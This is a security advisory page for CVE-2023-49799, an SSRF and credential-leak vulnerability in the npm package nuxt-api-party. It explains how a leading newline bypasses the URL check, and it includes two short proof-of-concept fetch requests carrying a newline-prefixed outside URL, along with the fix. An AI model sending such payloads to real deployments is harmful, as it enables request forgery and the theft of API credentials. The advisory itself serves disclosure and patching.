GHSA-3wfp-253j-5jxv

Suggest an improvement
Source
https://github.com/advisories/GHSA-3wfp-253j-5jxv
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/12/GHSA-3wfp-253j-5jxv/GHSA-3wfp-253j-5jxv.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-3wfp-253j-5jxv
Aliases
  • CVE-2023-49799
Published
2023-12-12T00:49:44Z
Modified
2023-12-12T01:26:47.398512Z
Severity
  • 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVSS Calculator
Summary
SSRF & Credentials Leak
Details

Summary

nuxt-api-party allows developers to proxy requests to an API without exposing credentials to the client. A previous vulnerability allowed an attacker to change the baseURL of the request, potentially leading to credentials being leaked or SSRF.

This vulnerability is similar, and was caused by a recent change to the detection of absolute URLs, which is no longer sufficient to prevent SSRF.

Details

nuxt-api-party attempts to check if the user has passed an absolute URL to prevent the aforementioned attack. This has been recently changed to use a regular expression ^https?://.

This regular expression can be bypassed by an absolute URL with leading whitespace. For example \nhttps://whatever.com has a leading newline.

According to the fetch specification, before a fetch is made the URL is normalized. "To normalize a byte sequence potentialValue, remove any leading and trailing HTTP whitespace bytes from potentialValue." (source)

This means the final request will be normalized to https://whatever.com. We have bypassed the check and nuxt-api-party will send a request outside of the whitelist.

This could allow us to leak credentials or perform SSRF.

PoC

POC using Node.

await fetch("/api/__api_party/MyEndpoint", {
    method: "POST",
    body: JSON.stringify({ path: "\nhttps://google.com" }),
    headers: { "Content-Type": "application/json" }
})

We can use __proto__ as a substitute for the endpoint if it is not known. This will not leak any credentials as all attributes on endpoint will be undefined.

await fetch("/api/__api_party/__proto__", {
    method: "POST",
    body: JSON.stringify({ path: "\nhttps://google.com" }),
    headers: { "Content-Type": "application/json" }
})

Impact

Leak of sensitive API credentials. SSRF.

Fix

Revert to the previous method of detecting absolute URLs.

  if (new URL(path, 'http://localhost').origin !== 'http://localhost') {
      // ...
  }
References

Affected packages

npm / nuxt-api-party

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.22.0